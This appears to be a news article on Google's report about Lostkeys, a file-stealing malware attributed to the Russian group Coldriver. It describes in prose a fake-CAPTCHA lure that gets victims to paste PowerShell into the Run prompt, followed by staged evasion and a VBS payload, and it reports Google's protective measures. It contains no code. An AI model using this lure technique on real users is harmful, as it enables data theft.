Google Threat Intelligence Group (GTIG) shared a report about a new piece of malware last week. The new malware, dubbed Lostkeys, is described as a data theft malware and is said to be linked with the Russian threat group Coldriver. Lostkeys is considered dangerous because it is being spread at the end of a multi-step chain that starts with a lure website. The malware can steal specific files from a hard-coded list of extensions and directories. Additionally, it can also send system information and running processes to the attacker.
New Malware Linked to Russian Threat Group Coldriver Identified
In a blog post, the Mountain View-based tech giant highlighted that the newly discovered malware was first observed in January, followed by multiple observations in March and April. It appears to be the new tool in the arsenal of the threat group Coldriver (also known as UNC4057, Star Blizzard, and Callisto).
Notably, Google highlights that Coldriver is known for running credential phishing against targets such as NATO governments, non-governmental organisations (NGOs), as well as militaries, journalists, and diplomatic officers. The group was associated with the Spica malware in 2024.
The modus operandi (MO) of the group is trickier than typical phishing attacks. First, fake emails impersonating legitimate institutions are shared with victims. These emails contain website links. These are lure websites that feature fake CAPTCHA to convince the victim of their legitimacy. When the user confirms the CAPTCHA, PowerShell is copied to the user’s clipboard.
Notably, PowerShell is a command-line shell and scripting language primarily used for system administration, automation, and configuration management in Windows environments. Because PowerShell is built into Windows and has deep system access, it’s often abused by attackers to download and execute malware in memory.
Once the PowerShell has been copied, the page prompts the user to execute it via the “run” prompt. Once the user has done that, it triggers the second stage, which is focused on calculating the MD5 hash of the display resolution of the device. It is typically followed by a third stage to evade execution in virtual machines (in case it did not detect MD5 in the second step).
After this, another code execution retrieves and decodes the final payload, which is a visual basic script (VBS) file, otherwise known as Lostkeys. GTIG highlights that it is capable of “stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker.”
Google states that Coldriver typically uses malware to steal emails and contacts from targets; however, at times, it is also known to deploy malware such as Spica to access documents on the target system. Lostkeys also enables a similar goal.
Notably, the tech giant has added all the identified malicious websites, domains, and files to Safe Browsing in Google Chrome to protect users from exploitation. Additionally, it is also sending government-backed attacker alerts to targeted Gmail and Workspace users. These alerts notify users about the threat and encourage them to enable Enhanced Safe Browsing.
